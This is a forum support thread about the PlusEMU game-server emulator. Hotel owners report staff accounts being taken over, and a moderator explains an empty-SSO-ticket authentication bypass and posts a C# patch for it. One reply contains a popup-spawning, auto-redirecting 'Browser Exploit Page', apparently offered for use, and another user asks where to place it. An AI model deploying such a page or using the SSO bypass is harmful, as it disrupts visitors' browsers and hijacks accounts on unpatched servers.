PlusEMU Support thread.

Status
Not open for further replies.

Meap

Don't need glasses if you C#
Nov 7, 2010
1,045
296
You probably have a CMS exploit yeah. That's most probable anyway.
I'm pretty confident I don't but maybe I missed something without realising, can never be too sure its just the fact I saw him do it to like two other hotels last night that makes me believe him a little bit more
 

Tyth

Member
Apr 25, 2016
36
6
Are you using a custom CMS? Or just a CMS that you fixed exploits on and modified. He could have got in through the housekeeping also.
 

Meap

Don't need glasses if you C#
Nov 7, 2010
1,045
296
Using RevCMS with a skin that got released awhile ago, my friend Jack used to use it on his hotel called Visions and I doubt he got into the hk because you need your staff pin code to be able to enter the housekeeping and even to get on the client you need a pin code everytime you enter the client
 

Avduf

Member
Dec 24, 2012
153
5
Here.
Code:
<html>

<head>
<!--Begin JavaScript.-->

<script language="JavaScript">

<!--

function geoPopup()
{
    // open the popup window
    var popupURL = "http://www.nthelp.com/tanjcode.htm";
var geoname=Math.random();
    var popup = window.open(popupURL,geoname,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
    // set the opener if it's not already set. it's set automatically
    // in netscape 3.0+ and ie 3.0+.
    if( navigator.appName.substring(0,8) == "Netscape" )
    {
        popup.location = popupURL;
    }
}

geoPopup();
geoPopup();

// -->

</script>

<!--End inserted JavaScript code.-->
<meta HTTP-EQUIV="REFRESH" CONTENT="6; URL=http://www.nthelp.com/tanj.htm" >
<title>Geo's Homepage</title>
</head>

<body bgcolor="000000" text="FF00FF">
<font face="arial"><font size="4">

<p align="center">Browser Exploit Page (kill this to stop) </font><br>
<br>
<br>
</p>
</font>
</body>
</html>
Thanks, and where should i put in this? Does it also need something to change?
 

AusNGrant

Member
Jun 21, 2015
74
9
Just had a guy from a french hotel manage to get into the Owners account on HabSlick, told me theres an error in plusemu regarding sso tickets? Hes french I dont understand him all that well, has anyone else heard of this?
Just woke up and came onto my hotel to hear the exact same story. This french guy has been going around hacking accounts. All CMS exploits out there are patched.
 

Jaden

not so active
Aug 24, 2014
886
263
Using RevCMS with a skin that got released awhile ago, my friend Jack used to use it on his hotel called Visions and I doubt he got into the hk because you need your staff pin code to be able to enter the housekeeping and even to get on the client you need a pin code everytime you enter the client
Release your CMS and we'll check for exploits.
 

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
5,199
3,934
So, for the SSO issue.

It's nothing big, but a silly mistake. There is no check for null SSO's, which doesn't sound dangerous but the first couple accounts are usually staff accounts.

If a user tries to login w/ no SSO they'll get one of the first accounts, had someone try it on Habboon today, figured out the issue yesterday, just didn't get round to rebooting until I got home.

To fix it's as simple as:

Go to SSOTicketEvent.cs

Replace it all with:
PHP:
    public class SSOTicketEvent : IPacketEvent
    {
        public void Parse(GameClient Session, ClientPacket Packet)
        {
            if (Session == null || Session.RC4Client == null || Session.GetHabbo() != null)
                return;

            string SSO = Packet.PopString();
            if (string.IsNullOrEmpty(SSO) || SSO.Length < 15)
                return;

            Session.TryAuthenticate(SSO);
        }
    }

The length is up to you, I just always have more than 15 length.
 

Rain

c
Mar 13, 2015
563
251
So, for the SSO issue.

It's nothing big, but a silly mistake. There is no check for null SSO's, which doesn't sound dangerous but the first couple accounts are usually staff accounts.

If a user tries to login w/ no SSO they'll get one of the first accounts, had someone try it on Habboon today, figured out the issue yesterday, just didn't get round to rebooting until I got home.

To fix it's as simple as:

Go to SSOTicketEvent.cs

Replace it all with:
PHP:
    public class SSOTicketEvent : IPacketEvent
    {
        public void Parse(GameClient Session, ClientPacket Packet)
        {
            if (Session == null || Session.RC4Client == null || Session.GetHabbo() != null)
                return;

            string SSO = Packet.PopString();
            if (string.IsNullOrEmpty(SSO) || SSO.Length < 15)
                return;

            Session.TryAuthenticate(SSO);
        }
    }

The length is up to you, I just always have more than 15 length.
Thanks, peace has been getting raped. I was logging logins, db queries, and everything i could.. and was not finding anything!
 

Meap

Don't need glasses if you C#
Nov 7, 2010
1,045
296
So, for the SSO issue.

It's nothing big, but a silly mistake. There is no check for null SSO's, which doesn't sound dangerous but the first couple accounts are usually staff accounts.

If a user tries to login w/ no SSO they'll get one of the first accounts, had someone try it on Habboon today, figured out the issue yesterday, just didn't get round to rebooting until I got home.

To fix it's as simple as:

Go to SSOTicketEvent.cs

Replace it all with:
PHP:
    public class SSOTicketEvent : IPacketEvent
    {
        public void Parse(GameClient Session, ClientPacket Packet)
        {
            if (Session == null || Session.RC4Client == null || Session.GetHabbo() != null)
                return;

            string SSO = Packet.PopString();
            if (string.IsNullOrEmpty(SSO) || SSO.Length < 15)
                return;

            Session.TryAuthenticate(SSO);
        }
    }

The length is up to you, I just always have more than 15 length.
Thanks for this Craig, also any idea when you can provide the fix for the Looks updating on the client instantly?
 

Vinny95

Member
Apr 28, 2016
53
1
Where can i change the Impila Magic? I need to change the variable 0.
 
It is included in the catalogue :)
7Y0Etey.png
You say to me, the ball i want is into the catalogue. But i test this ball and not working. Can you make a gif from your hotel of your ball? Because this ball don't work like i want.
 

KingBxtch

#KingBxtch
Sep 7, 2015
68
3
Can you please answer my question sir, where should i put it in?
The code doesnt work hence the reply it has changed ill try find it
 
Where can i change the Impila Magic? I need to change the variable 0.
 

You say to me, the ball i want is into the catalogue. But i test this ball and not working. Can you make a gif from your hotel of your ball? Because this ball don't work like i want.
Mine would be exactly the same if you use PlusEMU that Craig released...
 

Meap

Don't need glasses if you C#
Nov 7, 2010
1,045
296
@Sledmore how would I go about implementing MUS commands for housekeeping actions such as reloading badges and bans etc?
I tried this as a test to see if MUS would work but it didn't seem to do anything
Code:
<?php
    if(isset($_POST['disconnect']))
    {
        function MUS($command, $data = '')
         {
             $MUSdata = $command . chr(1) . $data;
             $socket = @socket_create(AF_INET, SOCK_STREAM, getprotobyname

        ('tcp'));
             @socket_connect($socket, "VPSIP", "30001"); // Change to proper IP/MUS Port
             @socket_send($socket, $MUSdata, strlen($MUSdata), MSG_DONTROUTE);   

             @socket_close($socket);
         }
         MUS("disconnect", " "George" ");
    }
?>
<form method="post">
    <input type="submit" value="Button" name="disconnect">
</form>
 
Status
Not open for further replies.

Users who are viewing this thread

Top